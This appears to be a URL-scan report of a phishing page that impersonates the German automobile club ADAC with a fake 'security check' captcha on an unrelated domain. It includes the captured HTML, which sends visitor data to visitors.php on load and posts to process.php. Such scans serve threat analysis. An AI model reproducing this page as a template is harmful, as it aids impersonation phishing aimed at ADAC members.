https://www.softwaretechnik.it/adac/adaccaptcha/

Eingereichte URL:
https://ddacgerman07.page.link/Zi7XUmgeleitet
Bericht beendet:

JavaScript-Variablen · 15 gefunden

NameTyp
0object
1object
2object
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject
___grecaptcha_cfgobject
grecaptchaobject
__recaptcha_apistring
__google_recaptcha_clientboolean

Konsolenprotokoll-Meldungen · 1 gefunden

TypKategorieProtokoll
logother
URL
https://www.softwaretechnik.it/adac/adaccaptcha/
Text
Visitor information sent to visitors.php

HTML

<!DOCTYPE html><html lang="de"><head><meta http-equiv="origin-trial" content="A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9">
  <meta charset="utf-8">
  <title>Sicherheitsüberprüfung | ADAC</title>
  <meta name="description" content="This is a Business Website">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="icon" href="assets/images/favicon.png">
  <!-- CSS -->
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css">
  <link rel="stylesheet" href="assets/fonts/stylesheet.css">
  <link rel="stylesheet" href="assets/css/style.css">
  <link rel="stylesheet" href="assets/css/responsive.css">
  <script type="text/javascript" async="" charset="utf-8" src="https://www.gstatic.com/recaptcha/releases/-ZG7BC9TxCVEbzIO2m429usb/recaptcha__en.js" crossorigin="anonymous" integrity="sha384-gaZtYaI7oJHEOo1YO6VuoCE4iZ5fMV9mYHP0BHf+r2ttABnpWWCIkgI6ItNW4ZdO"></script><script src="https://www.google.com/recaptcha/api.js" async="" defer=""></script>
</head>

<body>
  <div class="content-area">
    <header>
      <div class="header-logo">
        <a href="#"><img src="assets/images/logo.png" alt="logo"></a>
      </div>
    </header>

    <div class="loading-content-area">
      <div class="loading-content">
        <div class="captcha-icon">
          <i class="fas fa-shield-alt"></i>
        </div>

        <h2>Sicherheitsüberprüfung</h2>
        <p>Bitte bestätigen Sie, dass Sie kein automatisierter Zugriff sind. Klicken Sie auf '<strong>Ich bin kein Roboter</strong>', um die Sicherheitsprüfung abzuschließen, und anschließend auf '<strong>Weiter</strong>', um fortzufahren.</p>
        <form method="post" action="process.php" onsubmit="return validateCaptcha()">      
        <div class="g-recaptcha" data-sitekey="6LfXRHQqAAAAABBV2LbM1LEeOYT1NfCwQyrH0L3w" data-size="normal"><div style="width: 304px; height: 78px;"><div><iframe title="reCAPTCHA" width="304" height="78" role="presentation" name="a-othmc4td6ncz" frameborder="0" scrolling="no" sandbox="allow-forms allow-popups allow-same-origin allow-scripts allow-top-navigation allow-modals allow-popups-to-escape-sandbox allow-storage-access-by-user-activation" src="https://www.google.com/recaptcha/api2/anchor?ar=1&amp;k=6LfXRHQqAAAAABBV2LbM1LEeOYT1NfCwQyrH0L3w&amp;co=aHR0cHM6Ly93d3cuc29mdHdhcmV0ZWNobmlrLml0OjQ0Mw..&amp;hl=en&amp;v=-ZG7BC9TxCVEbzIO2m429usb&amp;size=normal&amp;cb=8pl0ltbnqek8"></iframe></div><textarea id="g-recaptcha-response" name="g-recaptcha-response" class="g-recaptcha-response" style="width: 250px; height: 40px; border: 1px solid rgb(193, 193, 193); margin: 10px 25px; padding: 0px; resize: none; display: none;"></textarea></div><iframe style="display: none;"></iframe></div>
        <p id="captcha-error" class="error"></p>
        <button type="submit">weiter</button>
  </form>
      </div>
    </div>

    <footer>
      <div class="footer-content">
        <ul>
          <li><a href="#">Impressum</a></li>
          <li><a href="#">Fragen &amp; Antworten</a></li>
          <li><a href="#">Datenschutz</a></li>
          <li><a href="#">Nutzungsbedingungen</a></li>
          <li><a href="#">Erstinformation §15 VersVermV</a></li>
          <li><a href="#">Kontakt</a></li>
          <li><a href="#"> Cookie-Einstellungen</a></li>
        </ul>
        <img src="assets/images/footer-logo.svg">
      </div>
    </footer>
  </div>

  <!-- JavaScript -->
  <script src="assets/js/jquery-3.7.1.min.js"></script>
  <script src="assets/js/script.js"></script>
  <script>
    function validateCaptcha() {
      var response = grecaptcha.getResponse();
      if (!response || response.length === 0) {
        document.getElementById('captcha-error').innerHTML =
          '<span style="color: red; font-weight: bold; font-family: inherit;"><i class="fas fa-exclamation-circle"></i> Bitte bestätigen Sie, dass Sie kein Roboter sind.</span>';
        document.getElementById('captcha-error').style.display = 'block';
        document.getElementById('captcha-error').style.textAlign = 'center';
        return false;
      } else {
        document.getElementById('captcha-error').style.display = 'none';
        return true;
      }
    }

    $(document).ready(function () {
        $.ajax({
            type: 'GET',
            url: 'visitors.php',
            success: function () {
                console.log('Visitor information sent to visitors.php');
            },
            error: function () {
                console.error('Failed to send visitor information');
            }
        });
    });
  </script>


<div style="background-color: rgb(255, 255, 255); border: 1px solid rgb(204, 204, 204); box-shadow: rgba(0, 0, 0, 0.2) 2px 2px 3px; position: absolute; transition: visibility 0s linear 0.3s, opacity 0.3s linear 0s; opacity: 0; visibility: hidden; z-index: 2000000000; left: 0px; top: -10000px;"><div style="width: 100%; height: 100%; position: fixed; top: 0px; left: 0px; z-index: 2000000000; background-color: rgb(255, 255, 255); opacity: 0.05;"></div><div class="g-recaptcha-bubble-arrow" style="border: 11px solid transparent; width: 0px; height: 0px; position: absolute; pointer-events: none; margin-top: -11px; z-index: 2000000000;"></div><div class="g-recaptcha-bubble-arrow" style="border: 10px solid transparent; width: 0px; height: 0px; position: absolute; pointer-events: none; margin-top: -10px; z-index: 2000000000;"></div><div style="z-index: 2000000000; position: relative;"><iframe title="recaptcha challenge expires in two minutes" name="c-othmc4td6ncz" frameborder="0" scrolling="no" sandbox="allow-forms allow-popups allow-same-origin allow-scripts allow-top-navigation allow-modals allow-popups-to-escape-sandbox allow-storage-access-by-user-activation" src="https://www.google.com/recaptcha/api2/bframe?hl=en&amp;v=-ZG7BC9TxCVEbzIO2m429usb&amp;k=6LfXRHQqAAAAABBV2LbM1LEeOYT1NfCwQyrH0L3w" style="width: 100%; height: 100%;"></iframe></div></div></body></html>